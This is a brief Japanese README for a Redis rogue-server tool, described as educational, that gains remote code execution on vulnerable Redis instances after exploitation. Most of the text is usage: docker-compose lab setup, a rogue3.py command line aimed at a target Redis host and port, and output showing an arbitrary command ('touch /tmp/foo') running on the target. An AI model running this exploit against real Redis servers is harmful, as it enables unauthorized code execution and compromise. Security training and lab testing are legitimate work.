
ポストエクスプロイト用の教育用Redis rogueサーバーツール。悪意のあるRedisサーバーを展開して、脆弱なRedisインスタンスでリモートコード実行と任意のコマンド実行を達成する。
教育目的のみ
$ docker-compose build
$ docker-compose up -d
$ docker-compose exec rogue sh
/rogue/redis-rogue-server # python3 rogue3.py --rhost redis --rport 6379 --lhost rogue --lport 21000
...
[<<] touch /tmp/foo
$ docker-compose exec redis sh
/data # ls /tmp/
foo